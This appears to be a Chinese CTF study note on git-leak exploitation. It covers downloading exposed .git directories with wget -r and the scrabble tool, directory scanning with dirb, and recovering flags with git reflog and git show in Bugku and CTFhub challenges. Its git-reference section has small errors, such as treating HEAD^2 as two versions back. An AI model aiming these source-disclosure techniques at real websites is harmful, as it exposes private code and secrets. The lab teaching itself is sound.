Nu1L Book——git 泄露

获取git泄露网页源代码

使用wget -r进行循环下载

例如有http://example.com/网站存在git泄露

1
wget -r http://example.com/.git

下载以后,会在文件夹下多出一个网站源码文件夹

使用scrabble工具进行下载

项目地址:GitHub——scrabble

下载解压后,进入工具目录

使用方法:(注意:使用时必须保证该网站下有.git文件)

1
./scrabble http://example.com

网页源码会在文件夹目录下

image-20210317201752203


git 命令

git reset 命令
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
git reset [--soft  --mixed  --hard] [HEAD]
默认:--mixed
--mixed 为默认,可以不用带该参数,用于重置暂存区的文件与上一次的提交(commit)保持一致,工作区文件内容保持不变。
--soft 参数用于回退到某个版本:
--hard 参数撤销工作区中所有未提交的修改内容,将暂存区与工作区都回到上一次版本,并删除之前的所有信息提交:

HEAD 表示当前版本
HEAD^ 上一个版本
HEAD^^ 上上一个版本
HEAD^^^ 上上上一个版本

HEAD~0 表示当前版本
HEAD~1 上一个版本
HEAD^2 上上一个版本
HEAD^3 上上上一个版本

利用git reset回退到指定版本:

1
git reset 052e    #回退到指定版本
git log 命令
1
git log --stat    #使用该命令查看每个commit修改了哪些文件
git diffHEAD commit-id 命令
1
git diffHEAD commit-id    #比较当前版本与想查看的commit之间的变化
git reflog 命令
1
git reflog    #查看所有分支的所有操作记录(包括已经被删除的 commit 记录和 reset 的操作)

image-20210318185354464


总结

git泄露

有些时候,如果访问.git,会返回403,此时可以试探性访问.git/config,如果有文件内容返回,说明存在git泄露

image-20210318184710124


Bugku web 40 Write Up (git 泄露)

打开题目,注释里的是一个假flag

image-20210317193806539

dirb扫描目录

1
dirb http://114.67.246.176:19543

扫描结果如下:

image-20210317193944215

有一个http://114.67.246.176:19543/.git/HEAD

猜测有.git泄露

使用wget -r进行循环下载

1
wget -r http://114.67.246.176:19543/.git

下载到本地

image-20210317194122836

进入文件夹,使用git reflog命令,获取操作日志

1
git reflog

image-20210317194915329

再使用git show commit_id:查看某次commit的内容

一个个尝试,最后在40c6d51这个版本号中找到了flag

1
git show 40c6d51

image-20210317195219834

获得的flag如下:flag{git_is_good_distributed_version_control_system}


CTFhub git泄露 index Write Up

题目场景:http://challenge-beb6a91c03b045f5.sandbox.ctfhub.com:10080/

image-20210320130035077

使用scrabble工具获取.git泄露的源代码

1
./scrabble http://challenge-beb6a91c03b045f5.sandbox.ctfhub.com:10080/

image-20210320130257915

目前处在8dc22b,被remove flag的版本

使用git log工具查看日志

1
git log

image-20210320130419596

使用git show命令

1
git show

image-20210320130647068

flag为:ctfhub{eca65be88d9c23b1d6852dc8}

CTFhub git泄露 Stash Write Up


复现镜像——Nu1L Book 常用信息收集:

docker-compost.yml 文件内容如下:

1
2
3
4
5
6
7
version: '3.2'

services:
web:
image: registry.cn-hangzhou.aliyuncs.com/n1book/web-information-backk:latest
ports:
- 80:80

启动方式:

1
docker-compose up -d